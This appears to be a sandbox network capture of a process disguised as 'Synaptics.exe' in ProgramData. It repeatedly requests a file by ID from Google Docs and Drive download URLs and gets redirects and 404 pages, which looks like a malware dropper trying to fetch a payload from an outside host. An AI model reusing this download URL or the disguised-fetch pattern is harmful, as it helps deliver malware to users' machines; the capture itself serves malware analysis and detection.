                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-m-0ljyCkE6a4MskDahHYVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:25 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:25 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="0x8yB5d5edax8bfvBnnb5Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:25 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.7 | 50050 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:25 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2XMzhCP0DtDwVJt_vUSafQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        66 | 192.168.2.7 | 50049 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:25 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-YPpg3U94D1O98iGfatLnFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        67 | 192.168.2.7 | 50052 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:25 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:26 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC45BIOhOERzdvA9VjdHpPsxsXEI7YV1viQZGBAOD4oB752YF6dBLrY04yw2ATVCZIAxWMW9IYk
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:25 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-p3s5diROrRGM6ULqVv9B4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:26 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:26 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="zmvCylHS67D_sbO5Pojqhg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:26 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        68 | 192.168.2.7 | 50055 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:26 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        69 | 192.168.2.7 | 50063 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:26 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:26 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MtXsE35sEmZDf2k6Ninbpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        70 | 192.168.2.7 | 50064 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:26 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:26 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-OlTBWQ7lgGL3oDTq6cTU0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        71 | 192.168.2.7 | 50072 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:27 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:27 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-iIj4SqzgSsBN-siTSODDwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        72 | 192.168.2.7 | 50071 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:27 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:28 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4b0UZLAT798HZAbBJTykZ34GBErku33TJ6pcvb4JZS4b6-nhX5_JJaw3Rd-brlAk5d5D8uHWo
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:27 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Oji1xqDDsPCoXnltD1_51A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:28 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:28 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="bliSE4Qh8g2sUOslXWU7FA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:28 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        73 | 192.168.2.7 | 50074 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:27 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:28 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4IOpGA8Ao2P20TgHDrxvot3lOI0h_vJjeYmv8bO54H1CdIiT8NreImJfuZj5BAo8-q
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:28 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4TSUNT34mCQ5ghWjHmM4dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:28 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:28 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="5qicNOio7jJj-oLT_Edk2A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:28 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        74 | 192.168.2.7 | 50073 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:27 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:28 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:27 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7MQM6wOywVHpJA-CopQhMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
